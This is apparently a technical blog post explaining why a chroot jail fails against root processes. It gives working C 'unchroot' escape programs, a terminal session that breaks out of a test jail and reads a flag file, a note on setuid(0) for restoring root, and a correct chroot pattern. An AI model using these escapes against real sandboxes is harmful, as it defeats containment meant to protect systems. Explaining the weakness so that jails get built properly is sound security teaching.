Escaping a chroot jail/1

Everybody will tell you that a chroot jail (that is, making a process think that a directory is instead the root folder, and not letting it access or modify anything outside of that) is ineffective against a process with root privileges¹ (UID 0). Let’s see why.

The escape basically works like this:

We create a temporary folder (I named mine .42, hidden not to draw too much attention) and we chroot to that, this way we make sure our current working directory is outside the fake root, and we can do so because we’re ~~CEO~~root, Bitch²;
then we chroot to parent folders all the way up to the root (we don’t need to worry about going too up, /../../.. == /);
finally we spawn something, a shell, rm -rf, whatever.

Q: Why couldn’t we just do chroot("../../../../../../..") and call it a day?
A: Because even if the kernel does not want to keep us from doing what we want (we’re root, after all) it will keep faith to the chroot also with us and if from inside the chroot jail we ask to chroot("..") the kernel will regularly expand /.. to /. It has to do so, some programs might rely on that. So we have to move our working directory outside of the root before proceeding.

$ echo 1337 | sudo tee /FLAG 1337 $ mkdir chroot $ cd chroot/ $ mkdir bin etc lib var home $ ln -s lib lib64 $ ldd /bin/sh linux-vdso.so.1 => (0x00007fffa9c83000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f9a29106000) /lib64/ld-linux-x86-64.so.2 (0x00007f9a294d8000) $ cp /bin/sh bin $ cp /lib/x86_64-linux-gnu/libc.so.6 lib $ cp /lib64/ld-linux-x86-64.so.2 lib $ tree . ├── bin │ └── sh ├── etc ├── home ├── lib │ ├── ld-linux-x86-64.so.2 │ └── libc.so.6 ├── lib64 -> lib └── var 6 directories, 3 files $ $ cat > unchroot.c #include <sys/stat.h> #include <unistd.h> int main() { mkdir(".42", 0755); chroot(".42"); chroot("../../../../../../../../../../../../../../../.."); return execl("/bin/sh", "-i", NULL); } $ gcc -static -o unchroot unchroot.c $ $ sudo chroot . /bin/sh # ls /bin/sh: 1: ls: not found # ./unchroot # ls bin dev home lib media proc sbin sys var boot etc initrd.img lib64 mnt root selinux tmp vmlinuz cdrom FLAG initrd.img.old lost+found opt run srv usr vmlinuz.old # cat FLAG 1337 #

Other pitfalls

If chroot() changes also the working directory to be inside the jail this will make it impossible to pop outside by just chrooting to a sub-directory, but this will not stop us.

We can simply grab the file descriptor of the current directory before the first chroot call and then fchdir() to that. chroot() does not close file descriptors.

Also, if the root privileges were incorrectly dropped, for example by calling seteuid(), a call to setuid(0) might be useful in restoring them.

So, how does a correct chroot look like?

assert(UID > 0);
chdir("jail");
chroot(".");
setuid(UID);

And make sure that there are no setuid binaries inside the jail³!

A catch-all compile-everywhere C `unchroot`

#include <sys/stat.h> #include <unistd.h> #include <fcntl.h> int main() { int dir_fd, x; setuid(0); mkdir(".42", 0755); dir_fd = open(".", O_RDONLY); chroot(".42"); fchdir(dir_fd); close(dir_fd); for(x = 0; x < 1000; x++) chdir(".."); chroot("."); return execl("/bin/sh", "-i", NULL); }

Or even just the CAP_SYS_CHROOT privilege (that self-chroot jailing processes often forget to drop), most of the cases we just need to be able to run chroot().↩
Ahem.↩
find / -type f $ -perm -4000 -o -perm -2000 $↩

PyTux

Trips of a curious penguin.

Escaping a chroot jail/1

Other pitfalls

So, how does a correct chroot look like?

A catch-all compile-everywhere C `unchroot`

Other pitfalls

So, how does a correct chroot look like?

A catch-all compile-everywhere C unchroot

A catch-all compile-everywhere C `unchroot`